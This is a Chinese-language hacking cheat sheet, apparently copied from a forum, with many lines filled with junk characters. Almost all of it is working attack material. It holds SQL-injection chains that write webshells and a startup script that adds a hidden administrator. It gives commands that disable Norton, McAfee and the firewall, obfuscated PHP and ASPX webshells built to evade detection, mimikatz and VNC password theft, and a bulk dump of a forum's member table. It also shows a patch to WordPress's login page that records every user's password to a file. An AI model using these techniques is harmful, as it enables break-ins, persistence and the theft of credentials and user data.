( O2 u4 \ o7 ?insert into a values ("set wshshell=createobject (""wscript.shell"") " );& @6 o" M$ t" c; |
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );0 Z) T+ l0 |) U. N
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );. ?, T j& L) h# p& j. C8 C0 v
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";/ k/ u3 B2 m# o0 A, A
drop table a;
7 n# B* Q' Z3 p) e/ F8 V- d) r; j; U! `$ f- H
英文版本:
5 ^! Y0 o4 @( t; ~, z
7 { `! F8 \8 o3 Tuse test;
: J9 K+ r+ U5 r; |' r2 Ecreate table a (cmd text);* t- m8 W/ l0 P8 u- ]% i) j
insert into a values ("set wshshell=createobject (""wscript.shell"") " );# ?3 o7 v0 [$ d0 p. x8 @
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );) A1 _# F5 g Q. D- E6 `
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
$ @; s0 E7 q/ ]# u+ V2 dselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
8 H8 Y/ ~2 t) W$ O* T) X/ l( bdrop table a;0 R9 v4 J k6 Z# }% s7 a
9 _, j3 }( Q& u$ C# s' ecreate table a (cmd BLOB);2 z! W8 }" c- g9 d" X
insert into a values (CONVERT(木马的16进制代码,CHAR));
) I2 G( f% n- j1 Wselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe') @2 `% d: x: {" {
drop table a;2 _9 t) c& t& t2 G8 Z4 u5 r9 [
4 w' I1 r! O7 d6 Q" C
记录一下怎么处理变态诺顿
7 z6 g* ~6 @* I0 O6 o查看诺顿服务的路径2 g7 G5 R" r4 m: ?" d
sc qc ccSetMgr
4 Z: \0 _$ I5 u. p! k1 h# W然后设置权限拒绝访问。做绝一点。。0 G* ^; r" g: p5 w6 p, Y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system7 R, o( v% Y9 o" o P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
) s1 p' B4 _ N. P4 Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators* A2 X$ `4 ~( r! F+ k# T
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone) M/ I5 x# g, J4 E( Q# K/ q* h. z- s
$ s+ o: H4 Z) |# k& ?7 T: \
然后再重启服务器
4 u/ t) N: A. Q5 q7 F3 U5 X9 Siisreset /reboot
% g: O+ {/ F6 B4 \' Y7 a* b这样就搞定了。。不过完事后。记得恢复权限。。。。
, l4 y( u$ @/ Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F X2 W& K; V* R0 ?9 B! p G+ C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
" b) s6 s7 t Pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F" ?- N. M6 f! I7 W! w( _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F5 R, j4 r. D. v8 @
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin8 U' q5 B8 v, O! n
2 `3 l1 a: `9 Z3 W ?* `6 qEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
% d2 N& S. f7 X N! ?+ W; j# J# |: F* Z0 |) i" [
postgresql注射的一些东西7 t: _- G5 K* h
如何获得webshell
0 Q' R5 |7 C' ^http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
# ^% |8 `& N- K: N Q5 nhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); # K; p1 H. \& P: Q! l
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
1 N5 x- X* r% G/ n. X1 v3 `) _如何读文件
: R- O" X# ] C7 Z9 o9 j8 e1 I4 `3 ihttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);# }9 F6 {) s1 r) J9 ~. N7 h* a* G
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;* ^7 ~3 c, k |9 [/ S
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
* t( ]8 n3 J& a/ S% a
1 @# Z8 Z8 \3 G2 Dz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
7 ]" f: K$ r5 L) M: @4 a2 b# [当然,这些的postgresql的数据库版本必须大于8.X
/ W0 M0 C1 h9 T; v创建一个system的函数:+ p% r+ P+ y6 u) c/ r3 Z, Y' M
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
t. ]$ p& R! Y! G" S9 x
6 s8 H' K0 H9 U) a创建一个输出表:* l3 G- d$ X9 K! o& D9 g5 e( y
CREATE TABLE stdout(id serial, system_out text)
5 m7 A/ Y/ h- Q- f8 S* f% ?0 P0 u8 h9 @+ f" }! W! k) H7 }; G+ Z6 _* Y
执行shell,输出到输出表内:
" K$ `( _$ T) I+ }3 E- {SELECT system('uname -a > /tmp/test')$ I4 t& s$ O- S& Q
r6 s+ a8 M2 Qcopy 输出的内容到表里面;
; v |; e- J! _! C+ XCOPY stdout(system_out) FROM '/tmp/test'% k. x5 a# g$ Z/ P$ J8 c D
+ B5 }1 }2 L H W3 m从输出表内读取执行后的回显,判断是否执行成功; h6 @1 B- M4 r7 Y/ N# p
$ y5 _# a4 i" {" z8 P6 f4 d, n+ }& VSELECT system_out FROM stdout8 a* S. V" a* D) b7 `5 X9 x
下面是测试例子
2 j" U2 i3 c( }& B4 u. l% t+ ~) c1 n$ B$ N! E; g. I G7 f
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
% N6 r4 i+ f( a. F4 o. Q& ~
) A7 I4 ]+ |: h; ^/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'' k8 h& `; f* ?" c/ k/ M2 O% V
STRICT --
, A q3 j- s$ r) x$ U2 t: d" k7 i* C* j0 n! z9 K c% a- o
/store.php?id=1; SELECT system('uname -a > /tmp/test') --2 D, U5 |! M2 o
0 e- h3 ^( ]- h$ v" l/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --5 J" ]2 @% [4 O! P
! D0 v( h4 }& w6 m' S+ l/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
/ B/ O% v* i$ _9 k5 z! a- cnet stop sharedaccess stop the default firewall
6 Q) A9 m& R( ~/ Z# Hnetsh firewall show show/config default firewall
" s! M- v# |% G h+ Xnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
9 ^) Y4 u) X: x* E$ [netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall d$ ^4 \& f' E1 \
修改3389端口方法(修改后不易被扫出)
3 U# Y' F) g/ p6 j修改服务器端的端口设置,注册表有2个地方需要修改6 m* r) r3 G3 j8 u) M
* J2 I. r5 i/ H( [4 h) V4 e _
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
" m7 a" [' q1 e# I# gPortNumber值,默认是3389,修改成所希望的端口,比如6000. @: K# A2 a5 }/ Q4 ?- P1 C
( ?* F) I3 L3 a3 n
第二个地方:
1 }* h% v2 e$ ^, x/ i[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ) I; [0 v2 U# C) r! Z
PortNumber值,默认是3389,修改成所希望的端口,比如60008 I" [5 I5 R; f2 H' ^/ y8 N2 G: q' x
' F* R$ c4 x/ \$ ~& s" s, M- C$ V现在这样就可以了。重启系统就可以了
4 ^ W! W) U; ?1 e$ j$ W" i6 Q) v. I, ?* d1 F; C1 M
查看3389远程登录的脚本0 Q* V" I7 a) o3 {% R
保存为一个bat文件4 v( w4 a/ @7 A5 [- M( t6 W
date /t >>D:\sec\TSlog\ts.log
, n% Z6 r: y9 F( H" itime /t >>D:\sec\TSlog\ts.log
% t+ R, r7 E9 Z! ~8 g+ Inetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
* K' K+ a3 S2 q& Y( }start Explorer9 ?* b% J$ ^8 w0 S9 ^8 g9 }
$ b& C' U* z* E& @$ @ qmstsc的参数:
7 t `( x/ j, l3 g7 b
* `. M) K( E5 m: @6 w远程桌面连接9 H. i _5 N0 N! f
0 L! k8 a% P' U' N7 b! \4 L
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
4 M$ s' x5 f9 N4 _% [3 E1 E% Y2 V [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?) ?4 d4 [" ~% x9 q, R% _
3 W3 \& @# ]1 A) B7 B/ e$ P: V% r<Connection File> -- 指定连接的 .rdp 文件的名称。
: W9 r' r" j9 h( T
# w' ~0 T, M8 x# E/v:<server[:port]> -- 指定要连接到的终端服务器。
6 o* @: Q3 [, C5 K/ _& k
, |/ N8 ?" _1 a" ?, B8 I/console -- 连接到服务器的控制台会话。* \1 E: i7 T- p5 m
+ @- Z B7 t% M
/f -- 以全屏模式启动客户端。1 ]1 U6 ^( R7 f {/ V$ t
. }' R1 \ I$ P7 s! w) L
/w:<width> -- 指定远程桌面屏幕的宽度。2 B0 B/ l1 N" d6 s
/ V" s W% ]) V. C& Q8 J" d9 F' d
/h:<height> -- 指定远程桌面屏幕的高度。
+ n9 {/ Q) M6 \8 Y4 R: Q q0 f3 J8 q' C3 o. j- l! j& ]
/edit -- 打开指定的 .rdp 文件来编辑。 `; H; F) \- m( h( z4 h* {1 L
0 Y0 Y2 [/ {! ]$ M
/migrate -- 将客户端连接管理器创建的旧版2 E5 F v, s6 i1 }5 l/ p
连接文件迁移到新的 .rdp 连接文件。
: [$ ^0 S& _: f* t$ {4 c Z7 d2 b
$ x$ y+ [( |1 [* H+ `
) L- J( _% n, c! L, q1 B其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就 I6 Y7 a+ u( n/ v" T
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量. n& m: W& f- a! w7 x5 Q4 D+ ]9 d' C
0 |+ Q R$ O: m% P! ^
命令行下开启3389; f& [. G; R6 U+ G) w) H
net user asp.net aspnet /add: m2 ^9 d) l" g0 J
net localgroup Administrators asp.net /add% ?$ v( ^2 L+ r4 o
net localgroup "Remote Desktop Users" asp.net /add
% b9 R/ C" z3 v# mattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D1 t% y1 q8 N/ m( c
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
6 `! G) Y h. Z8 k3 s" z4 C; J6 ]echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1 w: g9 M' m/ l; {0 }$ Q
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
% _3 j2 p. F: D8 h: N. tsc config rasman start= auto! J) m8 S6 F' J5 L0 b
sc config remoteaccess start= auto
& N" g- o/ z6 g- \net start rasman
9 J1 N/ i/ i+ A4 Q0 n- O l3 Mnet start remoteaccess
/ }2 T; L3 x' d' O5 P- @Media
1 ?3 w# I. Z! M' |4 L* h5 T( K<form id="frmUpload" enctype="multipart/form-data"% X1 a6 p: `) k
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>/ x4 T* m# f; G
<input type="file" name="NewFile" size="50"><br>
, U. {& J; e0 G9 k6 q5 }# j<input id="btnUpload" type="submit" value="Upload">
- S* q: e9 O& O, P</form>+ Q& W |, Y' w: ]) a8 ?1 |
+ Y& b. H; t d7 `5 d
control userpasswords2 查看用户的密码
+ f+ u5 O% q: X; Yaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
% q, h+ d/ {' T9 NSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a/ J5 ^8 b8 ]6 g/ a3 }& b0 B7 ^
% @; X! L+ u5 r8 h$ W9 R
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
6 H, z# y6 p f+ b7 `: @" J" s测试1:/ m" a: V0 `: _5 T
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t17 D0 ? w6 I; T. h
x) J5 A* k5 b" E
测试2:
: j) q z0 B0 ^% C8 K) B- z1 G0 I. w& q
create table dirs(paths varchar(100),paths1 varchar(100), id int)
0 B ]) G2 _! k6 Y
, p; ~& U# A8 Y' a% s* }. Ldelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--8 D$ {- s2 ]1 R- a( l
& l M/ T5 ^4 z9 ]3 wSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1' U: `5 x# e! M e/ S M; ?7 B& _2 j
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令9 S. E8 P9 m5 [5 p! L
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
+ D- \* | S& M* `$ ]4 z8 Mnet stop mcafeeframework
6 ~8 P8 \4 R5 q: i" [6 [net stop mcshield
, ^4 h4 [" N: `' }) S6 O3 P# qnet stop mcafeeengineservice0 Z. w/ f) J5 y4 T3 Z- l$ v3 p7 }
net stop mctaskmanager! L% g- y5 H) Y0 [1 K/ P
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D- U& h" l/ Q6 X$ N# j( b
& w' ^( F9 h* D) r4 Y4 C! j4 Y
VNCDump.zip (4.76 KB, 下载次数: 1)
: {' F- t4 U0 w! M! C8 T% G3 _密码在线破解http://tools88.com/safe/vnc.php/ L b" F8 m6 T
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取& H0 t/ \: }. X1 g
9 ]$ V% a8 }4 [
exec master..xp_cmdshell 'net user'
3 r0 G' q( U2 x \. E; r' n, Zmssql执行命令。
4 u9 k5 J9 g* F& U0 u获取mssql的密码hash查询
; U; o) d) A' O- g( f3 ^# fselect name,password from master.dbo.sysxlogins7 N) ?/ m/ s2 ?* e# ]
* K! { E% i7 k6 X; p Kbackup log dbName with NO_LOG;9 L: _$ x# ]9 B5 ^, ?2 `
backup log dbName with TRUNCATE_ONLY;
1 Q/ ^5 H1 M( v# bDBCC SHRINKDATABASE(dbName);- e3 H# F3 }1 i
mssql数据库压缩( W. Z1 r1 Y* n6 ?" m5 W0 U; E
; q9 w' q& r5 {) p7 P/ v* o# \7 M
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK: ]. {/ | {3 }2 n5 g9 v9 O! r7 e9 f
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
' z9 b6 ^# M2 E$ c: F/ I
6 Q+ j/ C( H( {' [9 Mbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
3 D) H" m( H: t/ G4 m1 A+ t l备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak0 h* w* y0 p& X( r# W* L& b
, m+ V' A( c, t
Discuz!nt35渗透要点:
- F4 q+ o& S: F( G/ J8 t, i7 {(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default1 {8 t7 p/ [% i; u5 ^. a7 H
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>; }2 T2 r# d. s
(3)保存。4 j; e: t( Q% _% t d
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
2 a) @# E( C- t) [d:\rar.exe a -r d:\1.rar d:\website\
1 S: y& {! I8 _+ f递归压缩website8 m. s: G1 O, r" Z+ _# j
注意rar.exe的路径
8 U5 B0 @; H3 ^. U5 r$ {
2 t9 \+ r! t2 C$ o3 B9 r7 {9 q<?php: A; x+ [& Q3 X( v; b# A2 W4 `
. h J4 f5 n5 q" N* K8 Z$telok = "0${@eval($_POST[xxoo])}";
% M. t* G- ?8 q% @8 K5 R+ }1 B4 N. B
$username = "123456";% T! h$ j! N% m$ e
- G9 h: A# k6 M: U' {2 G1 P
$userpwd = "123456";
# L# T2 G2 {" }& \. c( M' I [* p- m" q9 z
$telhao = "123456";# E8 U* q" G7 r9 F: M9 p
9 [3 m( g. z% b/ b l3 X
$telinfo = "123456";9 s0 t( o: i0 ^: A) ]; C
: g7 S$ N# y/ E0 h& O6 z
?>
" g( C5 P+ c# U" A2 Lphp一句话未过滤插入一句话木马" j4 o } U _* s% u; [
$ ], G) \- B f9 j# Q6 C( |6 `
站库分离脱裤技巧' W# O* J# @3 g" R, k9 O" }9 F
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"', f9 r, Z* \ _) h
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'9 e9 E' R2 x7 d! l1 q2 o
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
4 R/ m$ V& W7 O7 i. [) r* _5 D这儿利用的是马儿的专家模式(自己写代码)。+ k; x) W7 P: H% j
ini_set('display_errors', 1);$ `% }/ u; p+ f, M) r
set_time_limit(0);) p- U5 ~' L4 b6 T/ E% l
error_reporting(E_ALL);
8 R6 {: C. y; o$ O; q: q: C$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());3 a' z- w$ ~$ h7 P
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());6 t- ~* \/ A& Q8 S, x
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());1 M, o+ O( J; T6 X
$i = 0;! c6 L& H3 g. \8 a
$tmp = '';
: Z% `# M) @: }$ |9 H9 @7 j9 P9 g pwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
5 N2 X5 \& \4 W: S $i = $i+1;! ?5 ^2 T8 c V- q2 R9 T: j4 u
$tmp .= implode("::", $row)."\n";
- F/ \& j5 n/ {2 P3 y- h if(!($i%500)){//500条写入一个文件
' W/ K A% w6 f! H* V6 ? $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';( f! I7 Z0 F4 k% c
file_put_contents($filename,$tmp);* w: f2 d& v, U
$tmp = '';5 _, h8 f. Y# v+ i
}
9 @: a, P7 Y3 w- p}% V1 I5 ^3 ^5 Z( K+ F
mysql_free_result($result);) e. a% {6 y4 ^; }' ^: j( V
" q% A _5 n# p9 O+ X) i: m* L) c: }- B; Y
5 e0 G! z6 s# S( _2 O
//down完后delete
) N: x# Y# _/ c2 l
( U5 c1 _# G! H K4 N7 N: O- d9 p* t6 m9 {) ~
ini_set('display_errors', 1);
8 e1 d2 B' i2 D3 _error_reporting(E_ALL);
) @0 z. I c( {7 V% r" Q$ h$i = 0;9 d; |. _3 w6 W/ B" E W( n8 _
while($i<32) {; @0 R3 t3 h4 c1 _2 ~' A
$i = $i+1;/ w+ J9 `5 c$ H* x, b* i1 E# w4 N
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
' z% E) @. i+ d6 V& T0 o unlink($filename);# k; h3 j$ c# X+ @0 C! f2 {( ^
}
6 s- L& V$ ~( `8 L. b& e* X% h' ~httprint 收集操作系统指纹 V* l' \1 p# _( b) _" i3 G* e1 D
扫描192.168.1.100的所有端口
$ M7 R, W( {( z1 h3 I8 i Pnmap –PN –sT –sV –p0-65535 192.168.1.100
4 B8 D+ L' e! nhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
9 o n# W: P" n- ]3 Uhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输/ _/ f q% O" _0 o
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
" Q% H# V$ W' r) D0 h3 ^" F
5 ^2 F$ M Y; R7 Z" B* eDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
- O- |) z8 n5 t# P& V3 [' K9 t" h1 {& I0 I" O
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)7 I6 W1 A# H1 I' J! X X& e8 v
- |5 S3 H$ b3 _ b5 {- Q0 s3 v Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x, S+ o0 \( q/ h8 B7 o
% f1 U9 ]7 h, i DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)5 k+ O# W; \/ B7 I
% y F/ N% J: C$ h
http://net-square.com/msnpawn/index.shtml (要求安装)1 Q# Y3 C' c# o1 l. e' O
5 d6 b" \' F' I# o. t; u) X" H tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
7 F5 s+ V4 x3 b5 N2 |9 q v& r& { i; n, I% A: j
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)1 F# ?1 q( ]( ?9 f6 o
set names gb2312
% \' g- v: A2 c+ n" a% U; F导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
8 ^- |) C7 f1 m4 S" L2 x
% v6 a7 X/ E) cmysql 密码修改
7 X0 [0 l+ n/ s1 f+ O4 }- k PUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” * Q. ]$ }$ ]' J* v4 ?' Q9 v
update user set password=PASSWORD('antian365.com') where user='root';
$ [4 \" {' H @. l8 r( k# P, uflush privileges;& b' w/ E7 a' ?- Z6 W9 U
高级的PHP一句话木马后门
( L% R% \ X; `2 E, e; G: {2 `
) d$ @0 H" f5 D5 X7 D7 ]入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀" f, d. S Y6 X
4 k& U2 O$ v" m- O1、3 T8 z, i7 w4 g, b5 ?
; J& r6 f- d* i- q+ b
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
2 }4 I; H6 W1 J* I2 _; `! w* a( \! u' A1 ` N9 X: o
$hh("/[discuz]/e",$_POST['h'],"Access");( S; J1 K1 E, `9 i r- @! C- B' e
. f/ r3 H* m% l. l) K9 v: \/ w
//菜刀一句话1 g6 }) c" [2 e& X: l% w4 W4 z
. B8 q4 G3 b3 b, e% y! ~
2、
5 l" G4 e+ G/ w2 H2 `7 O! q8 |# B" A' m7 H. i; c2 S
$filename=$_GET['xbid'];
3 ?+ ~7 M1 k# s, k c
( r. `' n; J1 V5 f) [include ($filename);" U$ Y$ |- G3 H3 O i- Q2 [
( O( v) j: \! k8 Q+ ~9 I% U//危险的include函数,直接编译任何文件为php格式运行4 S& Y( z# H# N8 b
$ F0 r z; |& q( R. h- p3、2 O& }% N( m0 v* f* c
4 b5 j4 n* R7 r: q7 Z; f$reg="c"."o"."p"."y";/ ]: _6 ?) b' b% M) ~$ C
?" I4 p, H7 r4 |! e$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);9 ^9 P6 H& k9 n
# r. d- e6 B3 n }, M& O" U//重命名任何文件
# F& V9 |( d7 Y3 k% Q2 [6 i4 O& {0 H w( _; Q8 ~! `2 _; \* _
4、
3 b0 C4 K! ^+ b
6 o% f9 W6 b9 F8 m% h0 D+ G G M$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
: F# l- q% ?0 s( K) s
/ z' e/ U- c: w. d' ~5 S) Q$gzid("/[discuz]/e",$_POST['h'],"Access");: S5 {8 Z9 U$ F6 B& V4 t: C
$ _' _! O f: F2 q: o% W) s//菜刀一句话1 X) s1 U$ v5 G* [. t
9 A z: b7 n$ k1 H/ {$ N; B5、include ($uid);" `$ V+ L+ q- C8 D# C; k
^; b9 ?2 n' j) q J" d% {3 a$ J
//危险的include函数,直接编译任何文件为php格式运行,POST , i- {- X. w: j! v
. n; b& \% ]' d
8 I J$ [& R8 |5 E* o//gif插一句话8 {8 `* i, n& l x& H% W* L+ {0 l% u; B
u( p6 `1 `- m7 F1 F7 a
6、典型一句话7 p2 {+ [) F# d6 G* _, e
) w+ k6 p3 E. P8 `1 y; S
程序后门代码/ K2 v; ~ c' D% D' E- f
<?php eval_r($_POST[sb])?>! t8 w9 e3 b/ Y+ @9 Y F; U
程序代码. G2 \5 Q" e D* Z: ^
<?php @eval_r($_POST[sb])?>
2 W0 M" w0 v, P6 t/ c" _//容错代码6 P2 T+ b/ s$ A
程序代码
3 F) u5 p4 K7 M* Z# ~. Z<?php assert($_POST[sb]);?>$ T) ]' h7 Z6 ?1 U
//使用lanker一句话客户端的专家模式执行相关的php语句' D, a. O w9 u# G% P5 G3 B# ^2 E
程序代码
3 X& O* l/ M$ ~/ W) {' L<?$_POST['sa']($_POST['sb']);?>& _" W# H) {( x/ e
程序代码1 ?3 w1 t2 D1 v/ O7 Z9 b
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
5 c6 b# t0 @2 ?, n5 G0 k程序代码
1 I( T; m: S) K9 [0 K, [- i<?php
9 g2 d; S9 \1 ?: j# k1 Y@preg_replace("/[email]/e",$_POST['h'],"error");
1 h7 t# Y- a6 f8 g?>, M t: A' P2 d) i% | R4 W# Q
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入9 e5 Y+ B N' R/ ]2 t, A
程序代码( D, f( C: K2 T; S
<O>h=@eval_r($_POST[c]);</O>
$ G5 u% I7 v1 D程序代码4 W& Q4 i% B% s8 ~4 _
<script language="php">@eval_r($_POST[sb])</script>
# }! ]0 j) A4 h' [ S9 o8 C! t//绕过<?限制的一句话, _/ @# w0 U/ q! ^3 j4 `3 v. |
6 D, K; o% }$ P) b2 @/ f8 R
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
( J+ v2 i$ T% p详细用法:% s7 b5 D8 N3 q8 [7 x
1、到tools目录。psexec \\127.0.0.1 cmd: V% s! Y8 {9 I/ r
2、执行mimikatz
% Y$ w7 U/ U8 z' ]) Y. g* i+ Y3、执行 privilege::debug% F \7 N7 Y: N: w
4、执行 inject::process lsass.exe sekurlsa.dll
; }$ T! a2 O) X/ i/ O4 _5、执行@getLogonPasswords
- i. g. P' W# @/ E- z6、widget就是密码
( R& }5 k- L/ [' [ m# y7、exit退出,不要直接关闭否则系统会崩溃。
5 G5 v' ?; o1 u, X- f' [7 r+ o! O. L5 h' m4 G' r6 v
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面* m3 m) a, K# X' b
1 ?3 h& l5 |* e% w自动查找系统高危补丁
* N4 }. _' r" Y$ j' c+ ^systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
, y f# l4 P. |4 f- e$ m& t3 Z- o! ^# L2 P7 D4 j# u5 u
突破安全狗的一句话aspx后门
+ l1 q R, \+ T" }9 X. V<%@ Page Language="C#" ValidateRequest="false" %>
, a8 z6 ^; Z& W. P5 Q5 d<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>' n; j! M. I* z3 C! }$ k
webshell下记录WordPress登陆密码* O' R$ ?! Q' l! ^
webshell下记录Wordpress登陆密码方便进一步社工' H% Y! p3 o7 G2 Q+ h1 D/ A
在文件wp-login.php中539行处添加:
+ C6 h6 H! c" I1 L- s. ?$ U: m+ E// log password
2 i& U/ D/ t. ?, {$log_user=$_POST['log'];
5 @) {) h7 o# V! a" l$log_pwd=$_POST['pwd'];; K) `! K, Y& D7 e4 P, T8 q
$log_ip=$_SERVER["REMOTE_ADDR"];2 D @3 O* Z) z8 p
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
- K8 l! S( c0 M! m$txt=$txt.”\r\n”;7 O0 |8 `5 d9 I: Y6 n: ^5 T1 n, Y
if($log_user&&$log_pwd&&$log_ip){
$ k e5 G, O7 K4 h/ W1 N@fwrite(fopen(‘pwd.txt’,”a+”),$txt);* X' o4 k2 ?& H! V
}- o5 Y* w5 ]9 U. P9 g8 c
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。: k( q# z* ]/ z4 j. S
就是搜索case ‘login’* ~2 M7 x0 E* [( R& k, P7 Z% J* ~# d
在它下面直接插入即可,记录的密码生成在pwd.txt中,
9 h/ O) O4 n8 x1 E6 V其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录! o/ s. M' I( }
